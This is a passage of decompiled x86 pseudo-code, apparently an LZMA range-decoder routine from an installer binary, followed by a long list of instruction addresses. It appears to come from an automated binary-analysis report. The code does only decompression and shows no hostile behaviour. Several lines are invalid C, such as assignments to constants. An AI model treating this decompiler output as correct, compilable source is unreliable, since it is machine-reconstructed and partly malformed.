                                            											if(__ebx >= 0x100) {
                                            												goto L54;
                                            											}
                                            											L41:
                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            											 *(__ebp - 0x48) = __eax;
                                            											__eax = __eax + 1;
                                            											__eax = __eax << 8;
                                            											__eax = __eax + __ebx;
                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edx = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												 *(__ebp - 0x40) = 1;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												__ebx = __ebx + __ebx + 1;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edx;
                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L39;
                                            											} else {
                                            												goto L37;
                                            											}
                                            										case 0xe:
                                            											L46:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t156 = __ebp - 0x70;
                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t156;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											while(1) {
                                            												L48:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t170 = __edx + 1; // 0x1
                                            													__ebx = _t170;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													continue;
                                            												} else {
                                            													goto L46;
                                            												}
                                            											}
                                            											L54:
                                            											_t173 = __ebp - 0x34;
                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            											__eflags =  *_t173;
                                            											goto L55;
                                            										case 0xf:
                                            											L58:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xf;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t203 = __ebp - 0x70;
                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t203;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L60:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												L55:
                                            												__al =  *(__ebp - 0x44);
                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            												goto L56;
                                            											}
                                            											L61:
                                            											__eax =  *(__ebp - 0x58);
                                            											__edx = __ebx + __ebx;
                                            											__ecx =  *(__ebp - 0x10);
                                            											__esi = __edx + __eax;
                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												_t217 = __edx + 1; // 0x1
                                            												__ebx = _t217;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L60;
                                            											} else {
                                            												goto L58;
                                            											}
                                            										case 0x10:
                                            											L110:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x10;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t366 = __ebp - 0x70;
                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t366;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											goto L112;
                                            										case 0x11:
                                            											L69:
                                            											__esi =  *(__ebp - 0x58);
                                            											 *(__ebp - 0x84) = 0x12;
                                            											L132:
                                            											 *(_t612 - 0x54) = _t605;
                                            											goto L133;
                                            										case 0x12:
                                            											goto L0;
                                            										case 0x13:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												_t469 = __ebp - 0x58;
                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            												__eflags =  *_t469;
                                            												 *(__ebp - 0x30) = 0x10;
                                            												 *(__ebp - 0x40) = 8;
                                            												goto L144;
                                            											}
                                            											__eax =  *(__ebp - 0x4c);
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											 *(__ebp - 0x30) = 8;
                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            											goto L130;
                                            										case 0x14:
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            											__eax =  *(__ebp - 0x80);
                                            											L140:
                                            											 *(_t612 - 0x88) = _t533;
                                            											goto L1;
                                            										case 0x15:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            											__al = __al & 0x000000fd;
                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            											goto L121;
                                            										case 0x16:
                                            											__eax =  *(__ebp - 0x30);
                                            											__eflags = __eax - 4;
                                            											if(__eax >= 4) {
                                            												_push(3);
                                            												_pop(__eax);
                                            											}
                                            											__ecx =  *(__ebp - 4);
                                            											 *(__ebp - 0x40) = 6;
                                            											__eax = __eax << 7;
                                            											 *(__ebp - 0x7c) = 0x19;
                                            											 *(__ebp - 0x58) = __eax;
                                            											goto L145;
                                            										case 0x17:
                                            											goto L145;
                                            										case 0x18:
                                            											L146:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x18;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t484 = __ebp - 0x70;
                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t484;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L148:
                                            											_t487 = __ebp - 0x48;
                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                            											__eflags =  *_t487;
                                            											goto L149;
                                            										case 0x19:
                                            											__eflags = __ebx - 4;
                                            											if(__ebx < 4) {
                                            												 *(__ebp - 0x2c) = __ebx;
                                            												L120:
                                            												_t394 = __ebp - 0x2c;
                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                            												__eflags =  *_t394;
                                            												L121:
                                            												__eax =  *(__ebp - 0x2c);
                                            												__eflags = __eax;
                                            												if(__eax == 0) {
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            													goto L170;
                                            												}
                                            												__eflags = __eax -  *(__ebp - 0x60);
                                            												if(__eax >  *(__ebp - 0x60)) {
                                            													goto L171;
                                            												}
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            												__eax =  *(__ebp - 0x30);
                                            												_t401 = __ebp - 0x60;
                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            												__eflags =  *_t401;
                                            												goto L124;
                                            											}
                                            											__ecx = __ebx;
                                            											__eax = __ebx;
                                            											__ecx = __ebx >> 1;
                                            											__eax = __ebx & 0x00000001;
                                            											__ecx = (__ebx >> 1) - 1;
                                            											__al = __al | 0x00000002;
                                            											__eax = (__ebx & 0x00000001) << __cl;
                                            											__eflags = __ebx - 0xe;
                                            											 *(__ebp - 0x2c) = __eax;
                                            											if(__ebx >= 0xe) {
                                            												__ebx = 0;
                                            												 *(__ebp - 0x48) = __ecx;
                                            												L103:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__eax = __eax + __ebx;
                                            													 *(__ebp - 0x40) = 4;
                                            													 *(__ebp - 0x2c) = __eax;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x644;
                                            													__eflags = __eax;
                                            													L109:
                                            													__ebx = 0;
                                            													 *(__ebp - 0x58) = __eax;
                                            													 *(__ebp - 0x50) = 1;
                                            													 *(__ebp - 0x44) = 0;
                                            													 *(__ebp - 0x48) = 0;
                                            													L113:
                                            													__eax =  *(__ebp - 0x40);
                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            														_t392 = __ebp - 0x2c;
                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                            														__eflags =  *_t392;
                                            														goto L120;
                                            													}
                                            													__eax =  *(__ebp - 0x50);
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            													__eax =  *(__ebp - 0x58);
                                            													__esi = __edi + __eax;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__ax =  *__esi;
                                            													__ecx = __ax & 0x0000ffff;
                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                            													if( *(__ebp - 0xc) >= __edx) {
                                            														__ecx = 0;
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            														__ecx = 1;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            														__ebx = 1;
                                            														__ecx =  *(__ebp - 0x48);
                                            														__ebx = 1 << __cl;
                                            														__ecx = 1 << __cl;
                                            														__ebx =  *(__ebp - 0x44);
                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                            														__cx = __ax;
                                            														__cx = __ax >> 5;
                                            														__eax = __eax - __ecx;
                                            														__edi = __edi + 1;
                                            														__eflags = __edi;
                                            														 *(__ebp - 0x44) = __ebx;
                                            														 *__esi = __ax;
                                            														 *(__ebp - 0x50) = __edi;
                                            													} else {
                                            														 *(__ebp - 0x10) = __edx;
                                            														0x800 = 0x800 - __ecx;
                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            														 *__esi = __dx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L112:
                                            														_t369 = __ebp - 0x48;
                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                            														__eflags =  *_t369;
                                            														goto L113;
                                            													} else {
                                            														goto L110;
                                            													}
                                            												}
                                            												__ecx =  *(__ebp - 0xc);
                                            												__ebx = __ebx + __ebx;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            													__ecx =  *(__ebp - 0x10);
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													__ebx = __ebx | 0x00000001;
                                            													__eflags = __ebx;
                                            													 *(__ebp - 0x44) = __ebx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													L102:
                                            													_t339 = __ebp - 0x48;
                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                            													__eflags =  *_t339;
                                            													goto L103;
                                            												} else {
                                            													goto L100;
                                            												}
                                            											}
                                            											__edx =  *(__ebp - 4);
                                            											__eax = __eax - __ebx;
                                            											 *(__ebp - 0x40) = __ecx;
                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            											goto L109;
                                            										case 0x1a:
                                            											L56:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1a;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x68);
                                            											__al =  *(__ebp - 0x5c);
                                            											__edx =  *(__ebp - 8);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            											 *( *(__ebp - 0x68)) = __al;
                                            											__ecx =  *(__ebp - 0x14);
                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                            											__eax = __ecx + 1;
                                            											__edx = 0;
                                            											_t192 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t192;
                                            											goto L80;
                                            										case 0x1b:
                                            											L76:
                                            											__eflags =  *(__ebp - 0x64);
                                            											if( *(__ebp - 0x64) == 0) {
                                            												 *(__ebp - 0x88) = 0x1b;
                                            												goto L170;
                                            											}
                                            											__eax =  *(__ebp - 0x14);
                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            											__eflags = __eax -  *(__ebp - 0x74);
                                            											if(__eax >=  *(__ebp - 0x74)) {
                                            												__eax = __eax +  *(__ebp - 0x74);
                                            												__eflags = __eax;
                                            											}
                                            											__edx =  *(__ebp - 8);
                                            											__cl =  *(__eax + __edx);
                                            											__eax =  *(__ebp - 0x14);
                                            											 *(__ebp - 0x5c) = __cl;
                                            											 *(__eax + __edx) = __cl;
                                            											__eax = __eax + 1;
                                            											__edx = 0;
                                            											_t275 = __eax %  *(__ebp - 0x74);
                                            											__eax = __eax /  *(__ebp - 0x74);
                                            											__edx = _t275;
                                            											__eax =  *(__ebp - 0x68);
                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            											_t284 = __ebp - 0x64;
                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                            											__eflags =  *_t284;
                                            											 *( *(__ebp - 0x68)) = __cl;
                                            											L80:
                                            											 *(__ebp - 0x14) = __edx;
                                            											goto L81;
                                            										case 0x1c:
                                            											while(1) {
                                            												L124:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t415 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t415;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            												__eflags =  *(__ebp - 0x30);
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												 *(__ebp - 0x14) = _t415;
                                            												if( *(__ebp - 0x30) > 0) {
                                            													continue;
                                            												} else {
                                            													L81:
                                            													 *(__ebp - 0x88) = 2;
                                            													goto L1;
                                            												}
                                            											}
                                            											 *(__ebp - 0x88) = 0x1c;
                                            											L170:
                                            											_push(0x22);
                                            											_pop(_t567);
                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                            											_t535 = 0;
                                            											L172:
                                            											return _t535;
                                            									}
                                            								}
                                            								L171:
                                            								_t535 = _t534 | 0xffffffff;
                                            								goto L172;
                                            							}
                                            						}
                                            						__eax =  *(__ebp - 0x50);
                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            						__eax =  *(__ebp - 0x58);
                                            						__esi = __edx + __eax;
                                            						 *(__ebp - 0x54) = __esi;
                                            						__ax =  *__esi;
                                            						__edi = __ax & 0x0000ffff;
                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            						if( *(__ebp - 0xc) >= __ecx) {
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            							__cx = __ax;
                                            							__cx = __ax >> 5;
                                            							__eax = __eax - __ecx;
                                            							__edx = __edx + 1;
                                            							 *__esi = __ax;
                                            							 *(__ebp - 0x50) = __edx;
                                            						} else {
                                            							 *(__ebp - 0x10) = __ecx;
                                            							0x800 = 0x800 - __edi;
                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            							 *__esi = __cx;
                                            						}
                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                            							goto L148;
                                            						} else {
                                            							goto L146;
                                            						}
                                            					}
                                            					goto L1;
                                            				}
                                            			}








                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00000000
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x004065ac
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x00000000
                                            0x004068f7
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00000000
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
